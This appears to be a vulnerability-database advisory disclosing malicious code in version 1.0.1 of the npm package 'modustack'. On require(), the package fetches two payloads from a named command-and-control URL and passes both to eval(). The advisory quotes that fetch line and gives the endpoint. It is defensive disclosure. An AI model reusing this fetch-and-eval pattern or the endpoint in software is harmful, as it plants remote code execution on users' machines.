VDB
GCVE-110-OSM-2026-1408
GCVE-110-OSM-2026-1408
Advisory PublishedCVSS 9.6/10
Executes arbitrary attacker-controlled Node.js code fetched from https://apiscriptv3.vercel.app/api/x at require() time via dual eval() calls in the main process. index.js makes a top-level axios GET to the C2 endpoint and evaluates both r.data.content_o and r.data.content_n, delivering two independent attacker-controlled payloads with full Node.js scope.
On require(), index.js issues require('axios').get('https://apiscriptv3.vercel.app/api/x').then() and directly evaluates two fields from the response JSON: content_o and content_n. Both are runtime-fetched strings executed in the main process with access to the full Node.js environment. Unlike env_express there is no detached spawn — both payloads run synchronously in the caller's process.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | modustack | 1.0.1 (affected) | — |
Browse GCVE Records
73,280 records in the GCVE database · Updated July 17, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.